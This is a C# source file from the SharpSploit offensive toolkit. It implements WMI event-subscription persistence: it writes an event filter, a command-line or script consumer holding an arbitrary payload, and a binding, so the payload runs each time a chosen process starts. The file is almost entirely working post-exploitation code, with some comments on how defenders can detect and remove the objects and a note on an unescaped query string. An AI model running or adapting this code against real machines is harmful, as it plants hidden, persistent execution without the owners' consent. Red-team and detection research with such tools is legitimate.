// Author: Ryan Cobb (@cobbr_io)
// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
// License: BSD 3-Clause
using System;
using System.Management;
namespace SharpSploit.Persistence
{
/// <summary>
/// WMI is a class for abusing WMI Event Subscriptions to establish persistence. Requires elevation.
/// </summary>
public class WMI
{
    /// <summary>
    /// Creates a WMI Event, Consumer and Binding to execute a payload.
    /// </summary>
    /// <author>Daniel Duggan (@_RastaMouse)</author>
    /// <returns>Bool. True if execution succeeds, false otherwise.</returns>
    /// <remarks>
    /// Credit to Andrew Luke (@sw4mp_f0x) for PowerLurk and
    /// Dominic Chell (@domchell) for Persistence Part 3 – WMI Event Subscription.
    ///
    /// Three objects are written to the WMI repository under the <c>root\subscription</c>
    /// namespace: an <c>__EventFilter</c>, an event consumer (<c>CommandLineEventConsumer</c>
    /// or <c>ActiveScriptEventConsumer</c>) and a <c>__FilterToConsumerBinding</c> that links
    /// them. All three share <paramref name="EventName"/> as their <c>Name</c>, so they can be
    /// located (and removed) together by enumerating those classes in that namespace;
    /// Sysmon records their creation as event IDs 19, 20 and 21 respectively.
    ///
    /// Order matters: the filter and consumer must exist before the binding is created.
    /// The two helper methods swallow their own exceptions and return <c>null</c>, so a
    /// failure in either step usually surfaces here as the <see cref="NullReferenceException"/>
    /// thrown by <see cref="CreateBinding"/>, which is caught, reported to stderr and turned
    /// into a <c>false</c> return. Partial state (e.g. a filter without a consumer) is not
    /// rolled back.
    /// </remarks>
    /// <param name="EventName">An arbitrary name to be assigned to the new WMI Event.</param>
    /// <param name="EventFilter">Specifies the event trigger to use. The options are ProcessStart.</param>
    /// <param name="EventConsumer">Specifies the action to carry out. The options are CommandLine (OS Command) and ActiveScript (JScript or VBScript).</param>
    /// <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
    /// <param name="ProcessName">Specifies the process name when the ProcessStart trigger is selected. Defaults to notepad.exe.</param>
    /// <param name="ScriptingEngine">Specifies the scripting engine when the ActiveScript consumer is selected. Defaults to VBScript.</param>
    public static bool InstallWMIPersistence(string EventName, EventFilter EventFilter, EventConsumer EventConsumer, string Payload, string ProcessName = "notepad.exe", ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
    {
        try
        {
            // Either helper returns null if its Put() failed; that null is what CreateBinding
            // dereferences below, and the resulting exception lands in the catch.
            ManagementObject eventFilter = CreateEventFilter(EventName, EventFilter, ProcessName);
            ManagementObject eventConsumer = CreateEventConsumer(EventName, EventConsumer, Payload, ScriptingEngine);
            CreateBinding(eventFilter, eventConsumer);
            return true;
        }
        catch (Exception e)
        {
            // Only the message is reported; the stack trace and exception type are lost here.
            Console.Error.WriteLine("WMI Exception: " + e.Message);
        }
        return false;
    }

    /// <summary>
    /// Creates and commits an <c>__EventFilter</c> in <c>root\subscription</c> whose WQL query
    /// watches <c>root/cimv2</c> for the trigger selected by <paramref name="EventFilter"/>.
    /// </summary>
    /// <param name="EventName">Value written to the filter's <c>Name</c> property.</param>
    /// <param name="EventFilter">Trigger type; only <see cref="EventFilter.ProcessStart"/> produces a query.</param>
    /// <param name="ProcessName">Process name matched by the <c>Win32_ProcessStartTrace</c> query.</param>
    /// <returns>
    /// The committed filter instance, or <c>null</c> if any step threw (the exception message is
    /// written to stderr and otherwise swallowed).
    /// </returns>
    /// <remarks>
    /// NOTE(review): <paramref name="ProcessName"/> is interpolated into the WQL string without
    /// escaping, so a value containing a single quote yields a malformed or altered query; the
    /// resulting exception is reported only via stderr. An <paramref name="EventFilter"/> value
    /// other than ProcessStart leaves <c>query</c> empty and <c>WqlEventQuery</c> is handed an
    /// empty string.
    /// </remarks>
    private static ManagementObject CreateEventFilter(string EventName, EventFilter EventFilter, string ProcessName)
    {
        ManagementObject _EventFilter = null;
        try
        {
            ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
            ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
            string query = string.Empty;
            if (EventFilter == EventFilter.ProcessStart)
            {
                // ProcessName goes into the query verbatim (no quoting of embedded ').
                query = $@"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='{ProcessName}'";
            }
            WqlEventQuery wql = new WqlEventQuery(query);
            _EventFilter = wmiEventFilter.CreateInstance();
            _EventFilter["Name"] = EventName;
            _EventFilter["Query"] = wql.QueryString;
            _EventFilter["QueryLanguage"] = wql.QueryLanguage;
            // The filter itself lives in root\subscription but evaluates events from root/cimv2.
            _EventFilter["EventNameSpace"] = @"root/cimv2";
            // Put() is the write to the WMI repository; this is the point a defender can observe.
            _EventFilter.Put();
        }
        catch (Exception e)
        {
            Console.Error.WriteLine(e.Message);
        }
        return _EventFilter;
    }

    /// <summary>
    /// Creates and commits the event consumer in <c>root\subscription</c>: a
    /// <c>CommandLineEventConsumer</c> carrying <paramref name="Payload"/> as its
    /// <c>CommandLineTemplate</c>, or an <c>ActiveScriptEventConsumer</c> carrying it as
    /// <c>ScriptText</c>.
    /// </summary>
    /// <param name="ConsumerName">Value written to the consumer's <c>Name</c> property.</param>
    /// <param name="EventConsumer">Which consumer class to instantiate.</param>
    /// <param name="Payload">Command line or script body stored on the consumer.</param>
    /// <param name="ScriptingEngine">
    /// Only used for ActiveScript; sets <c>ScriptingEngine</c> to "JScript" or "VBScript".
    /// Any other value leaves the property unset.
    /// </param>
    /// <returns>
    /// The committed consumer instance, or <c>null</c> if any step threw (the exception message is
    /// written to stderr and otherwise swallowed).
    /// </returns>
    /// <remarks>
    /// If <paramref name="EventConsumer"/> matches neither branch, <c>_EventConsumer</c> is still
    /// <c>null</c> when <c>Put()</c> is called; the resulting <see cref="NullReferenceException"/>
    /// is caught by the local handler and the method returns <c>null</c>.
    /// </remarks>
    private static ManagementObject CreateEventConsumer(string ConsumerName, EventConsumer EventConsumer, string Payload, ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
    {
        ManagementObject _EventConsumer = null;
        try
        {
            ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
            if (EventConsumer == EventConsumer.CommandLine)
            {
                _EventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
                _EventConsumer["Name"] = ConsumerName;
                // Consumer runs without a visible desktop session.
                _EventConsumer["RunInteractively"] = false;
                _EventConsumer["CommandLineTemplate"] = Payload;
            }
            else if (EventConsumer == EventConsumer.ActiveScript)
            {
                _EventConsumer = new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();
                _EventConsumer["Name"] = ConsumerName;
                if (ScriptingEngine == ScriptingEngine.JScript)
                    _EventConsumer["ScriptingEngine"] = "JScript";
                else if (ScriptingEngine == ScriptingEngine.VBScript)
                    _EventConsumer["ScriptingEngine"] = "VBScript";
                _EventConsumer["ScriptText"] = Payload;
            }
            // Null here (no branch taken) throws and is swallowed by the catch below.
            _EventConsumer.Put();
        }
        catch (Exception e)
        {
            Console.Error.WriteLine(e.Message);
        }
        return _EventConsumer;
    }

    /// <summary>
    /// Creates and commits a <c>__FilterToConsumerBinding</c> in <c>root\subscription</c> that
    /// links the given filter and consumer by their relative WMI paths.
    /// </summary>
    /// <param name="EventFilter">Committed <c>__EventFilter</c> instance; must not be null.</param>
    /// <param name="EventConsumer">Committed consumer instance; must not be null.</param>
    /// <remarks>
    /// Unlike the other helpers this method has no exception handling: a null argument
    /// (<c>.Path</c> access) or a failed <c>Put()</c> propagates to the caller.
    /// </remarks>
    private static void CreateBinding(ManagementObject EventFilter, ManagementObject EventConsumer)
    {
        ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
        ManagementObject _Binding = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
        // Binding references are the relative paths of the already-committed objects.
        _Binding["Filter"] = EventFilter.Path.RelativePath;
        _Binding["Consumer"] = EventConsumer.Path.RelativePath;
        _Binding.Put();
    }

    /// <summary>
    /// Event trigger types supported by <see cref="CreateEventFilter"/>.
    /// </summary>
    public enum EventFilter
    {
        /// <summary>Fires on <c>Win32_ProcessStartTrace</c> for a matching process name.</summary>
        ProcessStart
    }

    /// <summary>
    /// Consumer classes supported by <see cref="CreateEventConsumer"/>.
    /// </summary>
    public enum EventConsumer
    {
        /// <summary><c>CommandLineEventConsumer</c>; payload is a command line.</summary>
        CommandLine,
        /// <summary><c>ActiveScriptEventConsumer</c>; payload is script text.</summary>
        ActiveScript
    }

    /// <summary>
    /// Script engine written to an <c>ActiveScriptEventConsumer</c>'s <c>ScriptingEngine</c> property.
    /// </summary>
    public enum ScriptingEngine
    {
        JScript,
        VBScript
    }
}
}